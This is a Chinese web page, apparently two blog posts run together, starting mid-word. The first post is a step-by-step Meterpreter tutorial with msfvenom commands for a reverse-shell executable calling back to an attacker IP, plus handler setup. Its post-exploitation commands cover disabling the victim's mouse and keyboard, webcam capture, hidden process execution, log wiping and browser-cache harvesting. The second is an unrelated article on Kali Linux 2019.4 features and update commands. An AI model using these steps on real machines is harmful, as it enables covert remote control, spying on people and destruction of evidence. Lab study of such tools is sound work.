eterpreter
Meterpreter是Metasploit框架中的一個擴展模塊,作為溢出成功以后的攻擊載荷使用,攻擊載荷在溢出攻擊成功以后給我們返回一個控制通道。使用它作為攻擊載荷能夠獲得目標系統的一個Meterpreter shell的鏈接。Meterpreter shell作為滲透模塊有很多有用的功能,比如添加一個用戶、隱藏一些東西、打開shell、得到用戶密碼、上傳下載遠程主機的文件、運行cmd.exe、捕捉屏幕、得到遠程控制權、捕獲按鍵信息、清除應用程序、顯示遠程主機的系統信息、顯示遠程機器的網絡接口和IP地址等信息。
查看kali和window的ip
在kali終端ifconfig,ip是192.168.0.103
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.103 LPORT=5555 -f exe -o met.exe
生成met.exe可執行的exe,并點擊執行。
復制到win10主機,需要關閉window的防火墻
window點擊exe前,kali需要進入msfconsole, 5555需要對應
msfconsole
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload=> windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.0.103
lhost=> 192.168.0.103
msf5 exploit(multi/handler) > set lport 5555
lport=> 5555
exploit命令發起攻擊
在window桌面不小心放在重要的文件,直接cat查詢
補充下,msfconsole的一些命令,只有控制了window,下面的命令都可以執行。
# 讓他不能用鼠標
uictl開關鍵盤/鼠標
uictl [enable/disable] [keyboard/mouse/all] #開啟或禁止鍵盤/鼠標
uictl disable mouse #禁用鼠標
uictl disable keyboard #禁用鍵盤
# 如果開了攝像頭拍照
webcam攝像頭命令
webcam_list #查看攝像頭
webcam_snap #通過攝像頭拍照
webcam_stream #通過攝像頭開啟視頻
execute執行文件
execute #在目標機中執行文件
execute -H -i -f cmd.exe # 創建新進程cmd.exe,-H不可見,-i交互
# clearav清除日志
clearav #清除windows中的應用程序日志、系統日志、安全日志
# 基本網絡命令
ipconfig/ifconfig
netstat –ano
arp
getproxy #查看代理信息
route #查看路由
# 信息收集的腳本位于:
/usr/share/metasploit-framework/modules/post/windows/gather
/usr/share/metasploit-framework/modules/post/linux/gather
# 信息收集的腳本較多,僅列幾個常用的:
run post/windows/gather/checkvm #是否虛擬機
run post/linux/gather/checkvm #是否虛擬機
run post/windows/gather/forensics/enum_drives #查看分區
run post/windows/gather/enum_applications #獲取安裝軟件信息
run post/windows/gather/dumplinks #獲取最近的文件操作
run post/windows/gather/enum_ie #獲取IE緩存
run post/windows/gather/enum_chrome #獲取Chrome緩存
run post/windows/gather/enum_patches #補丁信息
run post/windows/gather/enum_domain #查找域控
其實很弄別人是不行的,別人怎么會傻傻的關防火墻。
11月26日,Kali Linux官網宣布了2019年第四個也是最后一個版本——Kali Linux 2019.4。相比之前有較大的變動,引起了很多安全愛好者的關注,例如全新的桌面環境Xfce、Kali Undercover模式(能夠偽裝成win10)、NetHunter Kex 。
啟動、登陸界面
Kali Linux 2019.4發行版更新說明
一個新的默認桌面環境,Xfce
新的GTK3主題(用于Gnome和Xfce)
引入Kali Undercover模式
Kali文檔有了一個新家,現在支持Git
公共包裝-把你的工具放進Kali
安裝在Android上的NetHunter Kex – Full Kali 桌面
安裝過程中的BTRFS
添加PowerShell
內核升級到5.3.9版本
…以及常規的錯誤修復和更新
新的桌面環境和GTK3主題
在最新的版本中,Kali完全舍棄了Gnome桌面而轉向了Xfce。官方認為,Gnome雖然功能很強大,有很多非常棒的特性,但對于大部分Kali用戶而言,要想的只是能夠一次運行多個終端窗口的窗口管理器和一個網頁瀏覽器。
其次,Kali需要支持從低端到高端不同的硬件設備,包括樹莓派。Kali致力于輕量級的解決方案,希望能夠在不同的設備上都盡可能提供一致的使用體驗。基于這些考慮,Gnome則顯得有些臃腫,故而選擇更為輕量的Xfce作為默認桌面環境。
暗黑主題和淺色主題
不過如果部分用戶仍然想繼續留在Gnome桌面環境,Kali最新版本則繼續提供了gnome版本,用戶可自行選擇。
Kali Undercover模式
如果你在某些環境中想用Kali做點什么,卻又不想被人輕易發現,那么Kali Linux 2019.4版本中提供了一個很好的掩護功能。
官方制作了一個小腳本,能夠快速將默認主題切換為類似Windows 10桌面環境,非常逼真,這樣可以放心的“工作”。再次運行腳本就可以重新切換回之前的主題。
Android手機上完整的Kali桌面——NetHunter Kex
還有一個重磅功能便是NetHunter Kex,可以通過安卓設備連接藍牙和鼠標,通過HDMI輸出獲得一個完整的Kali桌面環境。這其實有點類似現在智能手機上內置的桌面模式,提供輕量級的電腦工作模式。
在沒有體驗之前,你可能無法想象這個功能的真正強大支持。假如你的手機性能足夠好,利用這個功能基本等同于擁有一臺ARM的臺式機。NetHunter Kex目前仍處于測試階段,官方文檔介紹了詳細的使用方法:
https://www.kali.org/docs/nethunter/nethunter-kex-manager/
Powershell
從去年六月份開始,官方就有文檔說明在Kali Linux中安裝PowerShell,而在今年11月份的更新中,powershell已添加到主存儲庫中,現在只需要運行:
apt update && apt -y install powershell
就能讓你的系統擁有強大的PowerShell。
安裝過程中的BTRFS
Kali Linux 2019.4新增使用BTRFS作為根文件系統。這是Re4son記錄的一種令人驚嘆的方法,完成后,您可以在升級后執行文件系統回滾。
關于BTRFS
一種支持寫入時復制(COW)的文件系統,運行在Linux操作系統,采用GPL授權。目標是取代Linux當前的ext3文件系統,改善ext3的限制,特別是單個文件的大小,總文件系統大小或文件檢查和加入ext3未支持的功能,像是可寫快照(writable snapshots)、快照的快照(snapshots of snapshots)、內建磁盤陣列(RAID),以及子卷(subvolumes)。Btrfs也宣稱專注在“容錯、修復及易于管理”。
下載或更新
Kali Linux下載地址:
https://www.kali.org/downloads/
如果已經安裝舊版Kali Linux,可以直接快速更新:
root@kali:~# cat </etc/apt/sources.list deb http://http.kali.org/kali kali-rolling main non-free contrib EOF root@kali:~# root@kali:~# apt update && apt -y full-upgrade root@kali:~# root@kali:~# [ -f /var/run/reboot-required ] && reboot -f
切換到新版的Xfce桌面環境:
root@kali:~# apt -y install kali-desktop-xfce
檢查是否為最新版本:
root@kali:~# grep VERSION /etc/os-release VERSION="2019.4" VERSION_ID="2019.4" VERSION_CODENAME="kali-rolling" root@kali:~# root@kali:~# uname -v #1 SMP Debian 5.3.9-3kali1 (2019-11-20) root@kali:~# root@kali:~# uname -r 5.3.0-kali2-amd64 root@kali:~#
注意:“uname-r”的輸出可能會有所不同。